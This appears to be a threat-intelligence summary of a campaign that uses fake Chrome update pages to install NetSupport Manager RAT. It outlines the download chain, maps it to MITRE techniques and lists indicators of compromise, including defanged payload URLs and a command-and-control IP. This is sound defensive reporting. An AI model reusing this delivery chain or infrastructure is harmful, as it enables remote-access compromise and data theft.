Trellix detected a campaign that uses fake Chrome browser updates to lure victims into installing NetSupport Manager RAT, enabling data theft and remote control of infected machines. The operation shows similarities to the SocGholish activity, though links are not conclusive and toolsets differ. Hashtags: #NetSupportManager #SocGholish
Keypoints
- Campaign detected in late June 2023 centers on fake Chrome update pages used to deliver NetSupport Manager RAT.
- Compromised websites load malicious JavaScript from the threat actor’s command-and-control server to facilitate infection.
- The lure leads to a ZIP (UpdateInstall.zip) containing Browser_portable.js, which downloads the next stage.
- Second-stage Chrome_update.js downloads 1.bat via curl in ProgramData, then 2.bat installs and runs the RAT.
- VBScript and Batch scripts are used, with some VBScript content not executed while batch components perform primary downloads and execution.
- Persistence is established via scheduled tasks, and the RAT is configured to communicate with a gateway (5.252.178.48) for ongoing control.
MITRE Techniques
- [T1189] Drive-by Compromise – The campaign uses compromised sites to present a fake Chrome browser update to entice victims, leading them to install a remote administration software tool (RAT). “The campaign uses compromised sites to present a fake Chrome browser update to entice victims, leading them to install a remote administration software tool (RAT) called NetSupport Manager.”
- [T1105] Ingress Tool Transfer – The second stage JavaScript downloads a batch file and components using curl, enabling the next stage of payload. “The second stage JavaScript, “Chrome_update.js”, is a downloader. It downloads a batch file, “1.bat”, in the local ‘C://ProgramData’ folder and executes it.”
- [T1059.005] VBScript – VBScript files are used in the download chain, with incomplete execution noted. “The VBScript files are still in development or act as a dummy as it is noted that the “Wscrit.Arguments” is misspelled and the scripts are not executed.”
- [T1059.003] Windows Command Shell – Batch scripts execute and use curl to download further components. “the batch files are executed and use “curl” to download further components.”
- [T1053.005] Scheduled Task – The RAT is executed via scheduled tasks, establishing persistence and startup execution. “The NetSupport Manager RAT is extracted using the downloaded 7-zip utility and executed through scheduled tasks in the victim computer… persistence mechanism.”
- [T1027] Obfuscated/Compressed Files and Information – Second-stage code is obfuscated and padded with junk strings to hinder analysis. “Chrome_update.js… heavily padded with junk comment strings.”
Indicators of Compromise
- [URLs] compromised sites hosting malicious content – altiordp[.]com/cdn/www.php, cheetahsnv[.]com/cdn-js/wds.min.php, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe, ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat
- [Files] downloaded and executed components – 1.bat, 2.bat, Chrome_update.js, UpdateInstaller.zip, Browser_portable.js, tempy.7z, 7zz.exe (and other 4+ files)